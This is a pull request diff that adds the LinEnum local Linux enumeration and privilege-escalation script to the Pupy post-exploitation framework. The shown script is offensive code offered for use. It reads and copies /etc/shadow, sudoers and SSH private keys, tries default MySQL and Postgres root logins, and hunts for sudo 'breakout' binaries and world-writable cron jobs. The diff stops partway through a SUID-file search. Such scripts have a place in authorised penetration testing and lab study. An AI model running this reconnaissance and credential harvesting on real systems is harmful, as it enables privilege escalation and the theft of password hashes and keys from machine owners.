### PR TITLE
Imprvts in Outlook, Port_scan and Ps1_oneliner. New module (Linux): Privesc_checker

### DIFF
--- a/pupy/external/linenum/linenum.sh
+++ b/pupy/external/linenum/linenum.sh
@@ -1,0 +1,1208 @@
+#!/bin/bash
+#A script to enumerate local information from a Linux host
+v="version 0.5 (experimental)"
+#@oshearing
+
+#help function
+usage () 
+{ 
+echo -e "\n\e[00;31m#########################################################\e[00m" 
+echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m"
+echo -e "\e[00;31m#########################################################\e[00m"
+echo -e "\e[00;33m# www.rebootuser.com\e[00m"
+echo -e "\e[00;33m# $v\e[00m\n"
+echo -e "\e[00;33m# Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t \e[00m\n"
+
+		echo "OPTIONS:"
+		echo "-k	Enter keyword"
+		echo "-e	Enter export location"
+		echo "-t	Include thorough (lengthy) tests"
+		echo "-r	Enter report name" 
+		echo "-h	Displays this help text"
+		echo -e "\n"
+		echo "Running with no options = limited scans/no output file"
+		
+echo -e "\e[00;31m#########################################################\e[00m"		
+}
+while getopts "h:k:r:e:t" option; do
+ case "${option}" in
+	  k) keyword=${OPTARG};;
+	  r) report=${OPTARG}"-"`date +"%d-%m-%y"`;;
+	  e) export=${OPTARG};;
+	  t) thorough=1;;
+	  h) usage; exit;;
+	  *) usage; exit;;
+ esac
+done
+
+echo -e "\n\e[00;31m#########################################################\e[00m" |tee -a $report 2>/dev/null
+echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m" |tee -a $report 2>/dev/null
+echo -e "\e[00;31m#########################################################\e[00m" |tee -a $report 2>/dev/null
+echo -e "\e[00;33m# www.rebootuser.com\e[00m" |tee -a $report 2>/dev/null
+echo -e "\e[00;33m# $version\e[00m\n" |tee -a $report 2>/dev/null
+
+echo "Debug Info" |tee -a $report 2>/dev/null
+
+if [ "$keyword" ]; then 
+	echo "keyword = $keyword" |tee -a $report 2>/dev/null
+else 
+	:
+fi
+
+if [ "$report" ]; then 
+	echo "report name = $report" |tee -a $report 2>/dev/null
+else 
+	:
+fi
+
+if [ "$export" ]; then 
+	echo "export location = $export" |tee -a $report 2>/dev/null
+else 
+	:
+fi
+
+if [ "$thorough" ]; then 
+	echo "thorough tests = enabled" |tee -a $report 2>/dev/null
+else 
+	echo "thorough tests = disabled" |tee -a $report 2>/dev/null
+fi
+
+sleep 2
+
+if [ "$export" ]; then
+  mkdir $export 2>/dev/null
+  format=$export/LinEnum-export-`date +"%d-%m-%y_%k:%M"`
+  mkdir $format 2>/dev/null
+else 
+  :
+fi
+
+who=`whoami` |tee -a $report 2>/dev/null
+echo -e "\n" |tee -a $report 2>/dev/null
+
+echo -e "\e[00;33mScan started at:"; date |tee -a $report 2>/dev/null
+echo -e "\e[00m\n" |tee -a $report 2>/dev/null
+
+echo -e "\e[00;33m### SYSTEM ##############################################\e[00m" |tee -a $report 2>/dev/null
+
+#basic kernel info
+unameinfo=`uname -a 2>/dev/null`
+if [ "$unameinfo" ]; then
+  echo -e "\e[00;31mKernel information:\e[00m\n$unameinfo" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+procver=`cat /proc/version 2>/dev/null`
+if [ "$procver" ]; then
+  echo -e "\e[00;31mKernel information (continued):\e[00m\n$procver" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#search all *-release files for version info
+release=`cat /etc/*-release 2>/dev/null`
+if [ "$release" ]; then
+  echo -e "\e[00;31mSpecific release information:\e[00m\n$release" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#target hostname info
+hostnamed=`hostname 2>/dev/null`
+if [ "$hostnamed" ]; then
+  echo -e "\e[00;31mHostname:\e[00m\n$hostnamed" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### USER/GROUP ##########################################\e[00m" |tee -a $report 2>/dev/null
+
+#current user details
+currusr=`id 2>/dev/null`
+if [ "$currusr" ]; then
+  echo -e "\e[00;31mCurrent user/group info:\e[00m\n$currusr" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#last logged on user information
+lastlogedonusrs=`lastlog |grep -v "Never" 2>/dev/null`
+if [ "$lastlogedonusrs" ]; then
+  echo -e "\e[00;31mUsers that have previously logged onto the system:\e[00m\n$lastlogedonusrs" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#strips out username uid and gid values from /etc/passwd
+usrsinfo=`cat /etc/passwd | cut -d ":" -f 1,2,3,4 2>/dev/null`
+if [ "$usrsinfo" ]; then
+  echo -e "\e[00;31mAll users and uid/gid info:\e[00m\n$usrsinfo" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#lists all id's and respective group(s)
+grpinfo=`for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null`
+if [ "$grpinfo" ]; then
+  echo -e "\e[00;31mGroup memberships:\e[00m\n$grpinfo" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#checks to see if any hashes are stored in /etc/passwd (depreciated  *nix storage method)
+hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null`
+if [ "$hashesinpasswd" ]; then
+  echo -e "\e[00;33mIt looks like we have password hashes in /etc/passwd!\e[00m\n$hashesinpasswd" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+ 
+#locate custom user accounts with some 'known default' uids
+readpasswd=`grep -v "^#" /etc/passwd | awk -F: '$3 == 0 || $3 == 500 || $3 == 501 || $3 == 502 || $3 == 1000 || $3 == 1001 || $3 == 1002 || $3 == 2000 || $3 == 2001 || $3 == 2002 { print }'`
+if [ "$readpasswd" ]; then
+  echo -e "\e[00;31mSample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):\e[00m\n$readpasswd" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$readpasswd" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/passwd $format/etc-export/passwd 2>/dev/null
+else 
+  :
+fi
+
+#checks to see if the shadow file can be read
+readshadow=`cat /etc/shadow 2>/dev/null`
+if [ "$readshadow" ]; then
+  echo -e "\e[00;33m***We can read the shadow file!\e[00m\n$readshadow" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$readshadow" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/shadow $format/etc-export/shadow 2>/dev/null
+else 
+  :
+fi
+
+#checks to see if /etc/master.passwd can be read - BSD 'shadow' variant
+readmasterpasswd=`cat /etc/master.passwd 2>/dev/null`
+if [ "$readmasterpasswd" ]; then
+  echo -e "\e[00;33m***We can read the master.passwd file!\e[00m\n$readmasterpasswd" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$readmasterpasswd" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/master.passwd $format/etc-export/master.passwd 2>/dev/null
+else 
+  :
+fi
+
+#all root accounts (uid 0)
+echo -e "\e[00;31mSuper user account(s):\e[00m" | tee -a $report 2>/dev/null; grep -v -E "^#" /etc/passwd 2>/dev/null| awk -F: '$3 == 0 { print $1}' 2>/dev/null |tee -a $report 2>/dev/null
+echo -e "\n" |tee -a $report 2>/dev/null
+
+#pull out vital sudoers info
+sudoers=`cat /etc/sudoers 2>/dev/null | grep -v -e '^$'|grep -v "#"`
+if [ "$sudoers" ]; then
+  echo -e "\e[00;31mSudoers configuration (condensed):\e[00m$sudoers" | tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$sudoers" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/sudoers $format/etc-export/sudoers 2>/dev/null
+else 
+  :
+fi
+
+#can we sudo without supplying a password
+sudoperms=`echo '' | sudo -S -l 2>/dev/null`
+if [ "$sudoperms" ]; then
+  echo -e "\e[00;33mWe can sudo without supplying a password!\e[00m\n$sudoperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#known 'good' breakout binaries
+sudopwnage=`echo '' | sudo -S -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null`
+if [ "$sudopwnage" ]; then
+  echo -e "\e[00;33m***Possible Sudo PWNAGE!\e[00m\n$sudopwnage" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#checks to see if roots home directory is accessible
+rthmdir=`ls -ahl /root/ 2>/dev/null`
+if [ "$rthmdir" ]; then
+  echo -e "\e[00;33m***We can read root's home directory!\e[00m\n$rthmdir" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#displays /home directory permissions - check if any are lax
+homedirperms=`ls -ahl /home/ 2>/dev/null`
+if [ "$homedirperms" ]; then
+  echo -e "\e[00;31mAre permissions on /home directories lax:\e[00m\n$homedirperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#looks for files we can write to that don't belong to us
+if [ "$thorough" = "1" ]; then
+  grfilesall=`find / -writable -not -user \`whoami\` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null`
+  if [ "$grfilesall" ]; then
+    echo -e "\e[00;31mFiles not owned by user but writable by group:\e[00m\n$grfilesall" |tee -a $report 2>/dev/null
+    echo -e "\n" |tee -a $report 2>/dev/null
+  else
+    :
+  fi
+fi
+
+#looks for world-reabable files within /home - depending on number of /home dirs & files, this can take some time so is only 'activated' with thorough scanning switch
+if [ "$thorough" = "1" ]; then
+wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null`
+	if [ "$wrfileshm" ]; then
+		echo -e "\e[00;31mWorld-readable files within /home:\e[00m\n$wrfileshm" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+if [ "$thorough" = "1" ]; then
+	if [ "$export" ] && [ "$wrfileshm" ]; then
+		mkdir $format/wr-files/ 2>/dev/null
+		for i in $wrfileshm; do cp --parents $i $format/wr-files/ ; done 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#lists current user's home directory contents
+if [ "$thorough" = "1" ]; then
+homedircontents=`ls -ahl ~ 2>/dev/null`
+	if [ "$homedircontents" ] ; then
+		echo -e "\e[00;31mHome directory contents:\e[00m\n$homedircontents" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#checks for if various ssh files are accessible - this can take some time so is only 'activated' with thorough scanning switch
+if [ "$thorough" = "1" ]; then
+sshfiles=`find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls`
+	if [ "$sshfiles" ]; then
+		echo -e "\e[00;31mSSH keys/host information found in the following locations:\e[00m\n$sshfiles" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+  :
+fi
+
+if [ "$thorough" = "1" ]; then
+	if [ "$export" ] && [ "$sshfiles" ]; then
+		mkdir $format/ssh-files/ 2>/dev/null
+		for i in $sshfiles; do cp --parents $i $format/ssh-files/; done 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#is root permitted to login via ssh
+sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print  $2}'`
+if [ "$sshrootlogin" = "yes" ]; then
+  echo -e "\e[00;31mRoot is allowed to login via SSH:\e[00m" |tee -a $report 2>/dev/null; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### ENVIRONMENTAL #######################################\e[00m" |tee -a $report 2>/dev/null
+
+#current path configuration
+pathinfo=`echo $PATH 2>/dev/null`
+if [ "$pathinfo" ]; then
+  echo -e "\e[00;31mPath information:\e[00m\n$pathinfo" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#lists available shells
+shellinfo=`cat /etc/shells 2>/dev/null`
+if [ "$shellinfo" ]; then
+  echo -e "\e[00;31mAvailable shells:\e[00m\n$shellinfo" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#current umask value with both octal and symbolic output
+umask=`umask -S 2>/dev/null & umask 2>/dev/null`
+if [ "$umask" ]; then
+  echo -e "\e[00;31mCurrent umask value:\e[00m\n$umask" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#umask value as in /etc/login.defs
+umaskdef=`cat /etc/login.defs 2>/dev/null |grep -i UMASK 2>/dev/null |grep -v "#" 2>/dev/null`
+if [ "$umaskdef" ]; then
+  echo -e "\e[00;31mumask value as specified in /etc/login.defs:\e[00m\n$umaskdef" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#password policy information as stored in /etc/login.defs
+logindefs=`cat /etc/login.defs 2>/dev/null | grep "PASS_MAX_DAYS\|PASS_MIN_DAYS\|PASS_WARN_AGE\|ENCRYPT_METHOD" 2>/dev/null | grep -v "#" 2>/dev/null`
+if [ "$logindefs" ]; then
+  echo -e "\e[00;31mPassword and storage information:\e[00m\n$logindefs" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$logindefs" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/login.defs $format/etc-export/login.defs 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### JOBS/TASKS ##########################################\e[00m" |tee -a $report 2>/dev/null
+
+#are there any cron jobs configured
+cronjobs=`ls -la /etc/cron* 2>/dev/null`
+if [ "$cronjobs" ]; then
+  echo -e "\e[00;31mCron jobs:\e[00m\n$cronjobs" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#can we manipulate these jobs in any way
+cronjobwwperms=`find /etc/cron* -perm -0002 -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
+if [ "$cronjobwwperms" ]; then
+  echo -e "\e[00;33m***World-writable cron jobs and file contents:\e[00m\n$cronjobwwperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#contab contents
+crontab=`cat /etc/crontab 2>/dev/null`
+if [ "$crontab" ]; then
+  echo -e "\e[00;31mCrontab contents:\e[00m\n$crontab" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null`
+if [ "$crontabvar" ]; then
+  echo -e "\e[00;31mAnything interesting in /var/spool/cron/crontabs:\e[00m\n$crontabvar" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null`
+if [ "$anacronjobs" ]; then
+  echo -e "\e[00;31mAnacron jobs and associated file permissions:\e[00m\n$anacronjobs" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+anacrontab=`ls -la /var/spool/anacron 2>/dev/null`
+if [ "$anacrontab" ]; then
+  echo -e "\e[00;31mWhen were jobs last executed (/var/spool/anacron contents):\e[00m\n$anacrontab" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command)
+cronother=`cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u 2>/dev/null`
+if [ "$cronother" ]; then
+  echo -e "\e[00;31mJobs held by all users:\e[00m\n$cronother" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### NETWORKING  ##########################################\e[00m" |tee -a $report 2>/dev/null
+
+#nic information
+nicinfo=`/sbin/ifconfig -a 2>/dev/null`
+if [ "$nicinfo" ]; then
+  echo -e "\e[00;31mNetwork & IP info:\e[00m\n$nicinfo" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#dns settings
+nsinfo=`cat /etc/resolv.conf 2>/dev/null | grep "nameserver"`
+if [ "$nsinfo" ]; then
+  echo -e "\e[00;31mNameserver(s):\e[00m\n$nsinfo" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#default route configuration
+defroute=`route 2>/dev/null | grep default`
+if [ "$defroute" ]; then
+  echo -e "\e[00;31mDefault route:\e[00m\n$defroute" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#listening TCP
+tcpservs=`netstat -antp 2>/dev/null`
+if [ "$tcpservs" ]; then
+  echo -e "\e[00;31mListening TCP:\e[00m\n$tcpservs" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#listening UDP
+udpservs=`netstat -anup 2>/dev/null`
+if [ "$udpservs" ]; then
+  echo -e "\e[00;31mListening UDP:\e[00m\n$udpservs" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### SERVICES #############################################\e[00m" |tee -a $report 2>/dev/null
+
+#running processes
+psaux=`ps aux 2>/dev/null`
+if [ "$psaux" ]; then
+  echo -e "\e[00;31mRunning processes:\e[00m\n$psaux" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#lookup process binary path and permissisons
+procperm=`ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'`
+if [ "$procperm" ]; then
+  echo -e "\e[00;31mProcess binaries & associated permissions (from above list):\e[00m\n$procperm" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$procperm" ]; then
+procpermbase=`ps aux | awk '{print $11}'|xargs -r ls 2>/dev/null |awk '!x[$0]++'`
+  mkdir $format/ps-export/ 2>/dev/null
+  for i in $procpermbase; do cp --parents $i $format/ps-export/; done 2>/dev/null
+else 
+  :
+fi
+
+#anything 'useful' in inetd.conf
+inetdread=`cat /etc/inetd.conf 2>/dev/null`
+if [ "$inetdread" ]; then
+  echo -e "\e[00;31mContents of /etc/inetd.conf:\e[00m\n$inetdread" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$inetdread" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/inetd.conf $format/etc-export/inetd.conf 2>/dev/null
+else 
+  :
+fi
+
+#very 'rough' command to extract associated binaries from inetd.conf & show permisisons of each
+inetdbinperms=`cat /etc/inetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null`
+if [ "$inetdbinperms" ]; then
+  echo -e "\e[00;31mThe related inetd binary permissions:\e[00m\n$inetdbinperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+xinetdread=`cat /etc/xinetd.conf 2>/dev/null`
+if [ "$xinetdread" ]; then
+  echo -e "\e[00;31mContents of /etc/xinetd.conf:\e[00m\n$xinetdread" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$xinetdread" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/xinetd.conf $format/etc-export/xinetd.conf 2>/dev/null
+else 
+  :
+fi
+
+xinetdincd=`cat /etc/xinetd.conf 2>/dev/null |grep "/etc/xinetd.d" 2>/dev/null`
+if [ "$xinetdincd" ]; then
+  echo -e "\e[00;31m/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:\e[00m" ls -la /etc/xinetd.d 2>/dev/null |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#very 'rough' command to extract associated binaries from xinetd.conf & show permisisons of each
+xinetdbinperms=`cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null`
+if [ "$xinetdbinperms" ]; then
+  echo -e "\e[00;31mThe related xinetd binary permissions:\e[00m\n$xinetdbinperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+initdread=`ls -la /etc/init.d 2>/dev/null`
+if [ "$initdread" ]; then
+  echo -e "\e[00;31m/etc/init.d/ binary permissions:\e[00m\n$initdread" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi  
+
+#init.d files NOT belonging to root!
+initdperms=`find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
+if [ "$initdperms" ]; then
+  echo -e "\e[00;31m/etc/init.d/ files not belonging to root (uid 0):\e[00m\n$initdperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+rcdread=`ls -la /etc/rc.d/init.d 2>/dev/null`
+if [ "$rcdread" ]; then
+  echo -e "\e[00;31m/etc/rc.d/init.d binary permissions:\e[00m\n$rcdread" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#init.d files NOT belonging to root!
+rcdperms=`find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
+if [ "$rcdperms" ]; then
+  echo -e "\e[00;31m/etc/rc.d/init.d files not belonging to root (uid 0):\e[00m\n$rcdperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+usrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null`
+if [ "$usrrcdread" ]; then
+  echo -e "\e[00;31m/usr/local/etc/rc.d binary permissions:\e[00m\n$usrrcdread" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#rc.d files NOT belonging to root!
+usrrcdperms=`find /usr/local/etc/rc.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
+if [ "$usrrcdperms" ]; then
+  echo -e "\e[00;31m/usr/local/etc/rc.d files not belonging to root (uid 0):\e[00m\n$usrrcdperms" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### SOFTWARE #############################################\e[00m" |tee -a $report 2>/dev/null
+
+#sudo version - check to see if there are any known vulnerabilities with this
+sudover=`sudo -V 2>/dev/null| grep "Sudo version" 2>/dev/null`
+if [ "$sudover" ]; then
+  echo -e "\e[00;31mSudo version:\e[00m\n$sudover" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#mysql details - if installed
+mysqlver=`mysql --version 2>/dev/null`
+if [ "$mysqlver" ]; then
+  echo -e "\e[00;31mMYSQL version:\e[00m\n$mysqlver" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#checks to see if root/root will get us a connection
+mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null`
+if [ "$mysqlconnect" ]; then
+  echo -e "\e[00;33m***We can connect to the local MYSQL service with default root/root credentials!\e[00m\n$mysqlconnect" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#mysql version details
+mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null`
+if [ "$mysqlconnectnopass" ]; then
+  echo -e "\e[00;33m***We can connect to the local MYSQL service as 'root' and without a password!\e[00m\n$mysqlconnectnopass" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#postgres details - if installed
+postgver=`psql -V 2>/dev/null`
+if [ "$postgver" ]; then
+  echo -e "\e[00;31mPostgres version:\e[00m\n$postgver" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
+postcon1=`psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version`
+if [ "$postcon1" ]; then
+  echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+postcon11=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version`
+if [ "$postcon11" ]; then
+  echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+postcon2=`psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version`
+if [ "$postcon2" ]; then
+  echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+postcon22=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version`
+if [ "$postcon22" ]; then
+  echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#apache details - if installed
+apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null`
+if [ "$apachever" ]; then
+  echo -e "\e[00;31mApache version:\e[00m\n$apachever" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#what account is apache running under
+apacheusr=`cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*\export /,"")}1'`
+if [ "$apacheusr" ]; then
+  echo -e "\e[00;31mApache user configuration:\e[00m\n$apacheusr" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$apacheusr" ]; then
+  mkdir --parents $format/etc-export/apache2/ 2>/dev/null
+  cp /etc/apache2/envvars $format/etc-export/apache2/envvars 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### INTERESTING FILES ####################################\e[00m" |tee -a $report 2>/dev/null
+
+#checks to see if various files are installed
+echo -e "\e[00;31mUseful file locations:\e[00m" |tee -a $report 2>/dev/null; which nc 2>/dev/null |tee -a $report 2>/dev/null; which netcat 2>/dev/null |tee -a $report 2>/dev/null; which wget 2>/dev/null |tee -a $report 2>/dev/null; which nmap 2>/dev/null |tee -a $report 2>/dev/null; which gcc 2>/dev/null |tee -a $report 2>/dev/null
+echo -e "\n" |tee -a $report 2>/dev/null
+
+#limited search for installed compilers
+compiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null`
+if [ "$compiler" ]; then
+  echo -e "\e[00;31mInstalled compilers:\e[00m\n$compiler" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+ else 
+  :
+fi
+
+#manual check - lists out sensitive files, can we read/modify etc.
+echo -e "\e[00;31mCan we read/write sensitive files:\e[00m" |tee -a $report 2>/dev/null; ls -la /etc/passwd 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/group 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/master.passwd 2>/dev/null |tee -a $report 2>/dev/null
+echo -e "\n" |tee -a $report 2>/dev/null
+
+#search for suid files - this can take some time so is only 'activated' with thorough scanning switch (as are all suid scans below)
+if [ "$thorough" = "1" ]; then
